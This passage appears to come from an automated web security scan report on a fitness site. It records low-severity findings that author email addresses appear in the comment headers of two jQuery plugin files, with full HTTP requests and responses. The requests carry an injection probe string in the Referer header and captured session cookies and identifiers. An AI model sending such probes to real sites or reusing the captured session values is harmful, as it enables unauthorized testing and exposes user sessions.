Path:   /sites/all/themes/fitlife/javascripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/themes/fitlife/javascripts/jquery.cookie.js HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
Last-Modified: Mon, 07 Feb 2011 18:17:30 GMT
ETag: "ac79a-1096-49bb53eb0c280"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Cache-Control: max-age=739377
Expires: Tue, 22 Feb 2011 03:40:43 GMT
Date: Sun, 13 Feb 2011 14:17:46 GMT
Connection: close

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

6.4. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
Last-Modified: Wed, 29 Dec 2010 20:19:48 GMT
ETag: "e8539-646-498924a6ac100"
Accept-Ranges: bytes
Content-Length: 1606
Content-Type: application/javascript
Cache-Control: max-age=959944
Expires: Thu, 24 Feb 2011 16:56:49 GMT
Date: Sun, 13 Feb 2011 14:17:45 GMT
Connection: close

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
